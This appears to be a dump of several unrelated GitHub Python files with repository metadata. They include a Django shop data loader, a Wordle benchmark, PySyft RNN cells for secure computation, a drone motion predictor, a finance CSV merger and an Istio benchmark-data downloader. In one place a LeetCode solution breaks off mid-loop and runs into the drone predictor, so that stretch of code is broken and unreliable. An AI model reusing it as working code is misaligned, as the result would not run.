акция{0}'.format(i), body='Описание описание описаниеОписание описание описаниеОписание описание описаниеОписание описание описаниеОписание описание описаниеОписание описание описание',\n normal_price=normal_price, stock_price=stock_price,\n 
start_date=today,\n end_date=today + timezone.timedelta(days=100),\n code='12345', product_type=random.choice(pts),\n shop=random.choice(shops), brand=random.choice(brands),\n user=u,\n status=models.STATUS_PUBLISHED,\n compound='Состав, состав, состав, состав и еще состав, состав. Состав, состав, состав, состав и еще состав, состав.'\n )\n\n\n for filter_param in product.product_type.available_filters:\n k = 0\n max_num = random.choice(range(10))\n filter_values = list(models.FilterValue.objects.filter(filter_type=filter_param))\n random.shuffle(filter_values)\n for filter_value in filter_values:\n k += 1\n product.filter_values.add(filter_value)\n if k >= max_num: break\n\n banner = models.ProductBanner.objects.create(product=product, banner='discount_product_banner/bkkyr6vzv618mg5zg43t86c34siix65pvspaewnyhz59auhb6l.jpg', status=models.BANNER_STATUS_APPROVED)\n banner = models.ProductBanner.objects.create(product=product, banner='discount_product_banner/bkkyr6vzv618mg5zg43t86c34siix65pvspaewnyhz59auhb6l.jpg', status=models.BANNER_STATUS_ON_APPROVE)\n\n action_category = models.ProductAction.objects.create(start=False, start_date=product.start_date,\n end_date=product.end_date,\n action_type=models.ACTION_TYPE_CATEGORY,\n product=product,\n )\n\n action_popular = models.ProductAction.objects.create(start=False, start_date=product.start_date,\n end_date=product.end_date,\n action_type=models.ACTION_TYPE_POPULAR,\n product=product, banner=banner,\n )\n #product.pay()\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/aj9hmjhlxltwepken1peenkxh9jbomvsbeyvc0yyyi5x8h50un.jpg',\n weight=random.choice(range(10)),\n )\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/0w80ecji8mc7dmkpyotzhnx8y7t640y9pvyqxmhy8is42l2fqo.jpg',\n weight=random.choice(range(10)),\n )\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/5gf9yradwz66mdk92xed9ybgoh9mnilzysjvicc1o21mzevuak.jpg',\n weight=3,\n )\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/lgbhbw5y3ubwkd0o083noo5ker1vmayat7ifvq1k098043fxcr.jpg',\n weight=random.choice(range(10)),\n )\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/wmg7jjnuyd7dkjo2st7tmegtl2n1dlkpq2o2nf9g9nr57es4o3.jpg',\n weight=random.choice(range(10)),\n )\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/jv7qxolhjdqlk5swppj7y7frk91bnlefloi5fnuospnzr88s6a.jpg',\n weight=random.choice(range(10)),\n )\n\n models.ProductImage.objects.create(\n product=product,\n image='discount_product/y71e2oa250imfq7yo4q9hk6e40lu2i443oeu0ikuwjjrt4op4n.jpg',\n weight=random.choice(range(10)),\n )\n\n\n\n","repo_name":"poleha/tatamo","sub_path":"first_load.py","file_name":"first_load.py","file_ext":"py","file_size_in_byte":19955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38163141880","text":"#!/usr/bin/env python\n\n\nimport argparse\nimport concurrent.futures\nimport logging\nimport os\nimport random\nimport typing\n\nfrom tqdm import tqdm\n\nimport common\nimport algo1\n\n\nclass Benchmark:\n database: common.Database\n player_class: typing.Type[common.PlayerInterface]\n\n def __init__(self, database, player_class):\n self.database = database\n self.player_class = player_class\n\n def RunOne(self, answer_id):\n engine = common.GameEngine(answer_id, self.database, verbose=False)\n player = self.player_class(self.database)\n try_count 
= engine.Play(player)\n\n return try_count\n\n def RunBatch(self, batch: typing.List[int]):\n engine = common.GameEngine(-1, self.database, verbose=False)\n player = self.player_class(self.database)\n\n results = []\n for answer_id in batch:\n engine.answer_id = answer_id\n results.append(engine.Play(player))\n return results\n\n\n def RunAll(self, N: int=0, job_count: int=0):\n if N == 0:\n N = self.database.answer_count\n\n if job_count == 0:\n job_count = os.cpu_count() or 16\n\n batch_size = N // job_count\n print(f'start: job_count={job_count}, N={N}, batch_size={batch_size}')\n\n with concurrent.futures.ProcessPoolExecutor(\n max_workers=job_count) as executor:\n futures = {}\n\n answer_ids = random.sample(range(self.database.answer_count), N)\n\n for start in range(0, len(answer_ids), batch_size):\n batch = answer_ids[start:(start + batch_size)]\n future = executor.submit(self.RunBatch, batch)\n futures[future] = batch\n\n tqdm_kwargs = {\n 'total': len(futures),\n 'unit': 'ans',\n 'unit_scale': True,\n 'leave': True\n }\n\n accumulated_value = 0\n try_count_to_words = [[] for _ in range(10)]\n\n for future in tqdm(concurrent.futures.as_completed(futures),\n **tqdm_kwargs):\n batch = futures[future]\n try:\n results = future.result()\n except Exception:\n logging.exception('failed to process %s', batch)\n else:\n for answer_id, try_count in zip(batch, results):\n accumulated_value += try_count\n try_count_to_words[try_count].append(answer_id)\n\n print(f'average: {accumulated_value / N}')\n for try_count, answers in enumerate(try_count_to_words):\n if not answers:\n continue\n words = [self.database.guesses[word_id] for word_id in answers[:10]]\n print(f'{try_count}: {len(answers)} ==> {words}')\n\n\ndef Main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-N', type=int, default=0)\n parser.add_argument('--jobs', type=int, default=0)\n\n args = parser.parse_args()\n\n database = common.LoadData()\n benchmark = Benchmark(database, algo1.Player)\n\n benchmark.RunAll(args.N, args.jobs)\n\n\nif __name__ == '__main__':\n Main()\n","repo_name":"Stimim/Wordle","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40285559947","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 18 23:07:42 2017\n\n@author: Administrator\n\"\"\"\n\nclass Solution(object):\n def findContentChildren(self, g, s):\n \"\"\"\n :type g: List[int]\n :type s: List[int]\n :rtype: int\n \"\"\"\n g.sort()\n s.sort()\n k = i = 0\n while(i 1:\n self.input_data[\"others_input\"] = np.zeros((self.n_robots, self.past_horizon, 6, self.n_robots-1))\n else:\n args.others_input_type = \"none\"\n if self.n_obstacles > 0:\n self.input_data[\"obstacles_input\"] = np.zeros((self.n_robots, 6, self.n_obstacles))\n else:\n args.obstacles_input_type = \"none\"\n\n self.model = model_selector(args)\n self.model.call(self.input_data)\n self.model.load_weights(checkpoint_path)\n \n if self.model.stateful:\n for i in range(len(self.model.layers)):\n self.model.layers[i].stateful = False\n \n def predict(self, robot_data, obstacle_data):\n \n for query_quad_idx in range(self.n_robots):\n other_quad_idxs = [idx for idx in range(self.n_robots) if idx != query_quad_idx]\n \n self.input_data[\"query_input\"][query_quad_idx] = np.transpose( robot_data[3:6, : , query_quad_idx] )\n \n if self.n_robots > 1:\n self.input_data[\"others_input\"][query_quad_idx] = np.moveaxis( 
robot_data[0:6, : , other_quad_idxs] - robot_data[0:6, :, query_quad_idx:query_quad_idx+1], 0, 1)\n \n if self.n_obstacles > 0:\n self.input_data[\"obstacles_input\"][query_quad_idx] = obstacle_data - robot_data[0:6, -1, query_quad_idx:query_quad_idx+1]\n \n scaled_data = self.scaler.transform(self.input_data)\n \n scaled_data[\"target\"] = self.model.predict(scaled_data)\n vel_prediction = self.scaler.inverse_transform(scaled_data)[\"target\"]\n \n pos_prediction = np.zeros((self.n_robots, self.prediction_horizon+1, 3))\n pos_prediction[:, 0, :] = np.transpose(robot_data[0:3, -1 , :])\n for step in range(1, self.prediction_horizon+1):\n pos_prediction[:, step, :] = pos_prediction[:, step-1, :] + self.dt * vel_prediction[:, step-1, :]\n \n return np.swapaxes(pos_prediction[:, 1:, :], 0, -1)\n \n \n \n \n\n\n\n","repo_name":"FMartinezClaramunt/drone_prediction_network2","sub_path":"src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31256238635","text":"import matplotlib.pyplot as plt\n\n\ndef graph(formula, x_range, x_label, y_label, name):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(x_range, [formula(value) for value in x_range])\n plt.grid(True)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n plt.savefig(\"%s.png\" % name)\n","repo_name":"imscaradh/optimisationmethods","sub_path":"functionhelper/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24550515179","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import init\n\n\nfrom syft.frameworks.torch.tensors.interpreters.additive_shared import AdditiveSharingTensor\nfrom syft.frameworks.torch.tensors.interpreters import precision\nfrom syft.generic.pointers.pointer_tensor import PointerTensor\n\n\nclass RNNCellBase(nn.Module):\n \"\"\"\n Cell to be used as base for all RNN cells, including GRU and LSTM\n This class overrides the torch.nn.RNNCellBase\n Only Linear and Dropout layers are used to be able to use MPC\n \"\"\"\n\n def __init__(self, input_size, hidden_size, bias, num_chunks, nonlinearity=None):\n super(RNNCellBase, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.bias = bias\n self.num_chunks = num_chunks\n self.nonlinearity = nonlinearity\n self.fc_xh = nn.Linear(input_size, self.num_chunks * hidden_size, bias=bias)\n self.fc_hh = nn.Linear(hidden_size, self.num_chunks * hidden_size, bias=bias)\n self.reset_parameters()\n\n def reset_parameters(self):\n \"\"\"\n This method initializes or reset all the parameters of the cell.\n The paramaters are initiated following a uniform distribution.\n \"\"\"\n std = 1.0 / np.sqrt(self.hidden_size)\n for w in self.parameters():\n init.uniform_(w, -std, std)\n\n def init_hidden(self, input):\n \"\"\"\n This method initializes a hidden state when no hidden state is provided\n in the forward method. 
It creates a hidden state with zero values.\n \"\"\"\n h = torch.zeros(input.shape[0], self.hidden_size, dtype=input.dtype, device=input.device)\n if input.has_child() and isinstance(input.child, PointerTensor):\n h = h.send(input.child.location)\n if input.has_child() and isinstance(input.child, precision.FixedPrecisionTensor):\n h = h.fix_precision()\n child = input.child\n if isinstance(child.child, AdditiveSharingTensor):\n crypto_provider = child.child.crypto_provider\n owners = child.child.locations\n h = h.share(*owners, crypto_provider=crypto_provider)\n return h\n\n\nclass RNNCell(RNNCellBase):\n \"\"\"\n Python implementation of RNNCell with tanh or relu non-linearity for MPC\n This class overrides the torch.nn.RNNCell\n \"\"\"\n\n def __init__(self, input_size, hidden_size, bias=True, nonlinearity=\"tanh\"):\n super(RNNCell, self).__init__(input_size, hidden_size, bias, num_chunks=1)\n\n if nonlinearity == \"tanh\":\n self.nonlinearity = torch.tanh\n elif nonlinearity == \"relu\":\n self.nonlinearity = torch.relu\n else:\n raise ValueError(f\"Unknown nonlinearity: {nonlinearity}\")\n\n def forward(self, x, h=None):\n\n if h is None:\n h = self.init_hidden(x)\n h_ = self.nonlinearity(self.fc_xh(x) + self.fc_hh(h))\n\n return h_\n\n\nclass GRUCell(RNNCellBase):\n \"\"\"\n Python implementation of GRUCell for MPC\n This class overrides the torch.nn.GRUCell\n \"\"\"\n\n def __init__(self, input_size, hidden_size, bias=True, nonlinearity=None):\n super(GRUCell, self).__init__(input_size, hidden_size, bias, num_chunks=3)\n\n def forward(self, x, h=None):\n\n if h is None:\n h = self.init_hidden(x)\n\n gate_x = self.fc_xh(x)\n gate_h = self.fc_hh(h)\n x_r, x_z, x_n = gate_x.chunk(self.num_chunks, 1)\n h_r, h_z, h_n = gate_h.chunk(self.num_chunks, 1)\n\n resetgate = torch.sigmoid(x_r + h_r)\n updategate = torch.sigmoid(x_z + h_z)\n newgate = torch.tanh(x_n + (resetgate * h_n))\n\n h_ = newgate + updategate * (h - newgate)\n\n return h_\n\n\nclass LSTMCell(RNNCellBase):\n \"\"\"\n Python implementation of LSTMCell for MPC\n This class overrides the torch.nn.LSTMCell\n \"\"\"\n\n def __init__(self, input_size, hidden_size, bias=True, nonlinearity=None):\n super(LSTMCell, self).__init__(input_size, hidden_size, bias, num_chunks=4)\n\n def reset_parameters(self):\n super(LSTMCell, self).reset_parameters()\n\n # Bias of forget gate should be initialize with 1 or 2\n # Ref: http://proceedings.mlr.press/v37/jozefowicz15.pdf\n incr_bias = 1.0 / self.hidden_size\n init.constant_(self.fc_xh.bias[self.hidden_size : 2 * self.hidden_size], incr_bias)\n init.constant_(self.fc_hh.bias[self.hidden_size : 2 * self.hidden_size], incr_bias)\n\n def forward(self, x, hc=None):\n\n if hc is None:\n hc = (self.init_hidden(x), self.init_hidden(x))\n h, c = hc\n\n gate_x = self.fc_xh(x)\n gate_h = self.fc_hh(h)\n\n x_i, x_f, x_c, x_o = gate_x.chunk(self.num_chunks, 1)\n h_i, h_f, h_c, h_o = gate_h.chunk(self.num_chunks, 1)\n\n inputgate = torch.sigmoid(x_i + h_i)\n forgetgate = torch.sigmoid(x_f + h_f)\n cellgate = torch.tanh(x_c + h_c)\n outputgate = torch.sigmoid(x_o + h_o)\n\n c_ = torch.mul(forgetgate, c) + torch.mul(inputgate, cellgate)\n\n h_ = torch.mul(outputgate, torch.tanh(c_))\n\n return h_, c_\n\n\nclass RNNBase(nn.Module):\n \"\"\"\n Module to be used as base for all RNN modules, including GRU and LSTM\n This class overrides the torch.nn.RNNBase\n Only Linear and Dropout layers are used to be able to use MPC\n \"\"\"\n\n def __init__(\n self,\n input_size,\n hidden_size,\n num_layers,\n bias,\n 
batch_first,\n dropout,\n bidirectional,\n base_cell,\n nonlinearity=None,\n ):\n super(RNNBase, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.bias = bias\n self.batch_first = batch_first\n self.dropout = float(dropout)\n self.bidirectional = bidirectional\n self.num_directions = 2 if bidirectional else 1\n self.is_lstm = base_cell is LSTMCell\n self.nonlinearity = nonlinearity\n\n # Dropout layers\n # TODO: implement a nn.Dropout class for PySyft\n # Link to issue: https://github.com/OpenMined/PySyft/issues/2500\n\n # Build RNN forward layers\n sizes = [input_size, *(hidden_size for _ in range(self.num_layers - 1))]\n self.rnn_forward = nn.ModuleList(\n (base_cell(sz, hidden_size, bias, nonlinearity) for sz in sizes)\n )\n\n # Build RNN backward layers, if needed\n if self.bidirectional:\n self.rnn_backward = nn.ModuleList(\n (base_cell(sz, hidden_size, bias, nonlinearity) for sz in sizes)\n )\n\n def forward(self, x, hc=None): # noqa: C901\n # If batch_first == True, swap batch with seq_len\n # At the end of the procedure we swap it back to the original structure\n if self.batch_first:\n x = x.transpose(0, 1)\n\n # If hc is not None, hc is either a Tensor (RNNCell or GRUCell hidden state),\n # or a 2-tuple of Tensors (LSTMCell hidden and cell states).\n # For convenience, we make hc always listy so that:\n # hc[0] is the hidden state\n # hc[1] if it exists, is the cell state\n # At the end of the procedure, we swap it back to the original structure\n if hc is None:\n # Initialize hc\n hc = [self._init_hidden(x) for _ in range(2 if self.is_lstm else 1)]\n else:\n # Standardize hc per comment above\n if not self.is_lstm:\n hc = [hc]\n\n # As we did to x above, we swap back at the end of the procedure\n if self.batch_first:\n hc = [item.transpose(0, 1) for item in hc]\n\n batch_size = x.shape[1]\n seq_len = x.shape[0]\n\n # If bidirectional==True, split states in two, one for each direction\n if self.bidirectional:\n hc = [\n item.contiguous().view(self.num_layers, 2, batch_size, self.hidden_size)\n for item in hc\n ]\n hc_fwd = [item[:, 0, :, :] for item in hc]\n hc_back = [item[:, 1, :, :] for item in hc]\n else:\n hc_fwd = hc\n\n # Run through rnn in the forward direction\n output = x.new(seq_len, batch_size, self.hidden_size).zero_()\n for t in range(seq_len):\n hc_fwd = self._apply_time_step(x, hc_fwd, t)\n output[t, :, :] = hc_fwd[0][-1, :, :]\n\n # Run through rnn in the backward direction if bidirectional==True\n if self.bidirectional:\n output_back = x.new(seq_len, batch_size, self.hidden_size).zero_()\n for t in range(seq_len - 1, -1, -1):\n hc_back = self._apply_time_step(x, hc_back, t, reverse_direction=True)\n output_back[t, :, :] = hc_back[0][-1, :, :]\n\n # Concatenate both directions\n output = torch.cat((output, output_back), dim=-1)\n hidden = [\n torch.cat((hid_item, back_item), dim=0)\n for hid_item, back_item in zip(hc_fwd, hc_back)\n ]\n else:\n hidden = hc_fwd\n\n # If batch_first == True, swap axis back to get original structure\n if self.batch_first:\n output = output.transpose(0, 1)\n hidden = [item.transpose(0, 1) for item in hidden]\n\n # Reshape hidden to the original shape of hc\n hidden = tuple(hidden) if self.is_lstm else hidden[0]\n\n return output, hidden\n\n def _init_hidden(self, input):\n \"\"\"\n This method initializes a hidden state when no hidden state is provided\n in the forward method. 
It creates a hidden state with zero values for each\n layer of the network.\n \"\"\"\n h = torch.zeros(\n self.num_layers * self.num_directions,\n input.shape[1],\n self.hidden_size,\n dtype=input.dtype,\n device=input.device,\n )\n if input.has_child() and isinstance(input.child, PointerTensor):\n h = h.send(input.child.location)\n if input.has_child() and isinstance(input.child, precision.FixedPrecisionTensor):\n h = h.fix_precision()\n child = input.child\n if isinstance(child.child, AdditiveSharingTensor):\n crypto_provider = child.child.crypto_provider\n owners = child.child.locations\n h = h.share(*owners, crypto_provider=crypto_provider)\n return h\n\n def _apply_time_step(self, x, hc, t, reverse_direction=False):\n \"\"\"\n Apply RNN layers at time t, given input and previous hidden states\n \"\"\"\n rnn_layers = self.rnn_backward if reverse_direction else self.rnn_forward\n\n hc = torch.stack([*hc])\n hc_next = torch.zeros_like(hc)\n\n for layer in range(self.num_layers):\n inp = x[t, :, :] if layer == 0 else hc_next[0][layer - 1, :, :].clone()\n\n if self.is_lstm:\n hc_next[:, layer, :, :] = torch.stack(rnn_layers[layer](inp, hc[:, layer, :, :]))\n else:\n hc_next[0][layer, :, :] = rnn_layers[layer](inp, hc[0][layer, :, :])\n\n return hc_next\n\n\nclass RNN(RNNBase):\n \"\"\"\n Python implementation of RNN for MPC\n This class overrides the torch.nn.RNN\n \"\"\"\n\n def __init__(\n self,\n input_size,\n hidden_size,\n num_layers=1,\n nonlinearity=\"tanh\",\n bias=True,\n batch_first=False,\n dropout=0,\n bidirectional=False,\n ):\n\n super(RNN, self).__init__(\n input_size,\n hidden_size,\n num_layers,\n bias,\n batch_first,\n dropout,\n bidirectional,\n RNNCell,\n nonlinearity,\n )\n\n\nclass GRU(RNNBase):\n \"\"\"\n Python implementation of GRU for MPC\n This class overrides the torch.nn.GRU\n \"\"\"\n\n def __init__(\n self,\n input_size,\n hidden_size,\n num_layers=1,\n bias=True,\n batch_first=False,\n dropout=0,\n bidirectional=False,\n ):\n\n super(GRU, self).__init__(\n input_size, hidden_size, num_layers, bias, batch_first, dropout, bidirectional, GRUCell\n )\n\n\nclass LSTM(RNNBase):\n \"\"\"\n Python implementation of LSTM for MPC\n This class overrides the torch.nn.LSTM\n \"\"\"\n\n def __init__(\n self,\n input_size,\n hidden_size,\n num_layers=1,\n bias=True,\n batch_first=False,\n dropout=0,\n bidirectional=False,\n ):\n\n super(LSTM, self).__init__(\n input_size, hidden_size, num_layers, bias, batch_first, dropout, bidirectional, LSTMCell\n )\n","repo_name":"gkaissis/PriMIA","sub_path":"syft/frameworks/torch/nn/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":12742,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"61"} +{"seq_id":"28896148372","text":"import os\n\n# This function returns a list of all files located in the given directory path \n# and its subdirectories \ndef list_files(directory):\n # Initialize an empty list to store the file paths\n file_list = []\n \n # Recursively search for files in the given directory and its subdirectories using the os.walk() method\n for root, dirs, files in os.walk(directory):\n # Iterate over each file in the current directory level and append its full path to the list\n for name in files:\n file_list.append(os.path.join(root, name))\n \n # Return the final list of file paths\n return file_list\n\nimport pandas as pd\n# 写一个 function,参数是文件路径列表,加载其中 .csv 格式的文件数据,存储在 dataframe 中\n# 写好注释\ndef load_csv_files(file_list):\n \"\"\"\n 
Reads the CSV-format files in the file-path list and stores their data in a single DataFrame object\n \n Parameters:\n file_list: list of file paths\n \n Returns:\n DataFrame: the data from all CSV files (files of other types are ignored), returned as one DataFrame object\n \"\"\"\n # Create an empty Pandas DataFrame object\n df = pd.DataFrame()\n \n for file_path in file_list:\n # Check that the file is in CSV format, and filter out the file finance.csv \n if not file_path.endswith('.csv') or 'finance.csv' in os.path.basename(file_path):\n continue\n \n # Read the file and append its contents to the DataFrame\n print('file_path %s' % file_path)\n df_temp = pd.read_csv(file_path) # Check whether the file is empty; if it is, log the file name and skip it\n if df_temp.empty:\n print(f\"{file_path} is empty. SKIP\")\n continue\n \n for index, row in df_temp.iterrows():\n val = row[0]\n if isinstance(val, str) and (val.endswith(':') or val.endswith(':')):\n # Strip the trailing colon character\n df_temp.iat[index, 0] = val[:-1]\n \n df = pd.concat([df, df_temp], ignore_index=True)\n \n return df\n\n# Write a python function whose parameters are a dataframe and a file path\n# Check whether the file is in csv format; if it is not, raise an exception\n# Otherwise load the file contents and append the dataframe's data to the file as well\n# Merge rows that have the same value in the same column\n# Write good comments\ndef add_dataframe_to_csv(dataframe, file_path):\n \"\"\"\n This function loads data from a csv file and a dataframe. Merges rows with same value in a certain column.\n \n Args:\n - dataframe: pandas DataFrame object\n - file_path: str, file path of the csv file to be loaded\n \n Returns:\n - None\n \n Raises:\n - ValueError: if the file extension is not csv\n \n \"\"\"\n # Check that the file is in csv format\n if not file_path.endswith('.csv'):\n raise ValueError(\"Only csv files are accepted\")\n\n # Check whether the file file_path is empty\n # If it is empty, log it and create an empty DataFrame\n # If it is not empty, load its contents into df\n if os.path.getsize(file_path) > 0:\n df = pd.read_csv(file_path)\n else:\n print(f\"File {file_path} is empty. Init a DataFrame object.\")\n df = pd.DataFrame()\n\n # Append the passed-in dataframe to the existing data\n df = pd.concat([df, dataframe])\n\n # Deduplicate the dataframe\n # If different rows have the same value in the first column, keep only the last one\n df.drop_duplicates(subset=df.columns[0], keep='last', inplace=True)\n\n # Save the updated dataframe back to the csv file\n df.to_csv(file_path, index=False)\n\n\n# Write a python main that takes two command-line arguments: a directory path and a file path\n# The directory path is required, the file path is optional\n# If the file path argument is missing, create a file in the directory named finance.csv\nimport sys\nimport os\n\ndef main(directory_path, dictionary, file_path=None):\n \"\"\"\n A function that takes a directory path and an optional file path as arguments.\n If the file path argument is not given, it creates a CSV file named finance.csv in the directory path.\n If the file path argument is given, it checks if the file is in CSV format. If it's not, it raises an exception.\n If it's a CSV file, it loads its content, adds the data to the dataframe along with the existing data and merges the rows with same column value.\n\n Parameters:\n directory_path (str): Path of the directory where the csv file will be created or updated.\n file_path (str, optional): Path of the csv file to update. Defaults to None.\n\n Returns:\n None\n \"\"\"\n\n # If file path is not provided, create a finance.csv file in the directory\n if file_path is None:\n last_folder_name = os.path.basename(os.path.normpath(directory_path))\n file_path = os.path.join(directory_path, last_folder_name+'.finance.csv')\n\n if not os.path.exists(file_path):\n with open(file_path, 'w') as f:\n pass\n\n file_list = list_files(directory_path)\n df = load_csv_files(file_list)\n # Translate the financial-report line items into Simplified Chinese\n [df, missed_keys] = translate_to_simplified_chinese(df, dictionary)\n print(\"The entries that could not be translated are listed below: \\n\\n\")\n for key in missed_keys:\n print(key)\n add_dataframe_to_csv(df, file_path)\n\n# prompt: Define a function whose parameters are: dataframe, dictionary.\n# dictionary is a key/value map.\n# The first column of the dataframe contains strings; iterate over all cells of the first column, use each cell's contents as a key, and look up the value in dictionary.\n# If the value does not exist, use the default value N/A.\n# Finally, insert the values into the dataframe as the second column.\n## Translate the first column into Simplified Chinese (US- and HK-listed financial reports are not in Simplified Chinese)\n## Translating into Simplified Chinese unifies the terminology\ndef translate_to_simplified_chinese(dataframe, dictionary, default_value='N/A'):\n \"\"\"\n This function takes a dataframe and a dictionary as parameters. The dictionary is a key/value map.\n The first column of the dataframe contains strings. For each cell in the first column, this function\n will use its contents as a key to look up the corresponding value in the dictionary. If the value does\n not exist in the dictionary, then the default value specified (which defaults to 'N/A') will be used\n instead. The resulting values will be added as a new column to the dataframe.\n \"\"\"\n new_column = []\n missed_keys = []\n for _index, row in dataframe.iterrows():\n key = row[0]\n if key in dictionary:\n value = dictionary[key]\n else:\n value = default_value\n missed_keys.append(key)\n \n new_column.append(value)\n dataframe.insert(1, '项目', new_column)\n return [dataframe, missed_keys]\n\n\nfrom dictionary import load_data_from_file \n\nif __name__ == \"__main__\":\n try:\n# directory_path = sys.argv[1]\n directory_path = 'data/tesla'\n file_path = sys.argv[2] if len(sys.argv) > 2 else None\n print(\"start\")\n dictionary = load_data_from_file('src/dictionary.dict')\n main(directory_path, dictionary, file_path)\n except Exception as e:\n # Print the detailed stack trace\n import traceback\n print(traceback.format_exc())\n print(\"Usage: python script.py [directory_path] [file_path]\")\n","repo_name":"zman2013/extract_table_by_ocr","sub_path":"src/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":7293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29354002572","text":"import os\nimport datetime\nfrom google.cloud import storage\n\n\ncwd = os.getcwd()\nperf_data_path = cwd + \"/perf_data/\"\n\nload_generator_type = \"fortio\"\n\n\ndef download_benchmark_csv(download_dataset_days, current_release, project_id, bucket_name):\n\n if not current_release:\n current_release = os.getenv('CUR_RELEASE')\n if not project_id:\n project_id = os.getenv('PROJECT_ID')\n if not bucket_name:\n bucket_name = os.getenv('BUCKET_NAME')\n if not download_dataset_days:\n download_dataset_days = os.getenv('DOWNLOAD_DATASET_DAYS')\n\n bucket_prefix = os.getenv('BUCKET_PREFIX')\n bucket_delimiter = os.getenv('BUCKET_DELIMITER')\n\n print(current_release, project_id, bucket_name, bucket_prefix, bucket_delimiter, download_dataset_days)\n\n if not os.path.exists(perf_data_path):\n os.makedirs(perf_data_path)\n\n download_dateset = get_download_dateset(int(download_dataset_days))\n storage_client = storage.Client(project_id)\n\n bucket = 
storage_client.bucket(bucket_name)\n\n blobs = storage_client.list_blobs(bucket_name, prefix=bucket_prefix, delimiter=bucket_delimiter)\n print(list(blobs))\n prefixes = blobs.prefixes\n print(prefixes)\n\n cur_href_links = []\n cur_release_names = []\n cur_release_dates = []\n master_href_links = []\n master_release_names = []\n master_release_dates = []\n process_prefixes(download_dateset, bucket, prefixes, cur_href_links, cur_release_names, cur_release_dates,\n master_href_links, master_release_names, master_release_dates, current_release)\n\n delete_outdated_files(download_dateset)\n return cur_href_links, cur_release_names, cur_release_dates, master_href_links, master_release_names, master_release_dates\n\n\ndef process_prefixes(download_dateset, bucket, prefixes, cur_href_links, cur_release_names, cur_release_dates,\n master_href_links, master_release_names, master_release_dates, current_release):\n\n for prefix in prefixes:\n print(f\"{prefix}\")\n if load_generator_type in prefix:\n # an example benchmark_test_id would be like:\n # \"20200525_fortio_master_1.7-alpha.d0e07f6e430fd99554ccc3aee3be8a730cd8a226\"\n benchmark_test_id = prefix.split('/')[1]\n if current_release.split(\"-\")[1] in benchmark_test_id or \"master\" in benchmark_test_id:\n test_date, test_load_gen_type, test_branch, release_name = parse_perf_href_str(benchmark_test_id)\n print(f\"date: {test_date}, test_branch: {test_branch}, release_name: {release_name}\")\n if test_date in download_dateset:\n download_filename = \"benchmark.csv\"\n dump_filename = benchmark_test_id + \"_\" + download_filename\n dump_to_filepath = perf_data_path + dump_filename\n is_exist = check_exist(dump_filename)\n\n # Make the API the same as previously so view.py parsing works.\n fake_prefix = \"/././\" + prefix\n if test_branch == \"master\":\n master_href_links.insert(0, fake_prefix)\n master_release_names.insert(0, release_name)\n master_release_dates.insert(0, test_date)\n else:\n cur_href_links.insert(0, fake_prefix)\n cur_release_names.insert(0, release_name)\n cur_release_dates.insert(0, test_date)\n try:\n if is_exist:\n continue\n blob_id = prefix + download_filename\n blob = bucket.blob(blob_id)\n blob.download_to_filename(dump_to_filepath)\n print(f\"downloaded: {blob_id}\")\n except Exception as e:\n if test_branch == \"master\":\n master_href_links.pop(0)\n master_release_names.pop(0)\n master_release_dates.pop(0)\n else:\n cur_href_links.pop(0)\n cur_release_names.pop(0)\n cur_release_dates.pop(0)\n print(e)\n else:\n continue\n\n\ndef get_download_dateset(download_dataset_days):\n download_dateset = set()\n today = datetime.date.today() + datetime.timedelta(days=1)\n for day_interval in list(range(1, download_dataset_days)):\n prev_date = (today - datetime.timedelta(day_interval)).strftime(\"%Y%m%d\")\n download_dateset.add(prev_date)\n return download_dateset\n\n\ndef delete_outdated_files(download_dateset):\n filenames = ['master_temp.csv', 'cur_temp.csv']\n for f in os.listdir(perf_data_path):\n if f in filenames:\n continue\n f_prefix = f.split(\"_\")[0]\n if f_prefix not in download_dateset:\n os.remove(perf_data_path + f)\n\n\ndef check_exist(filename):\n for f in os.listdir(perf_data_path):\n if f == filename:\n return True\n return False\n\n\ndef parse_perf_href_str(benchmark_test_id):\n # TODO:\n # - can make this to be env var: LOAD_GEN_TYPE for switching between fortio and nighthawk\n # - extract test_parts to a class when pipeline label is stable\n test_parts = benchmark_test_id.split(\"_\")\n test_date = 
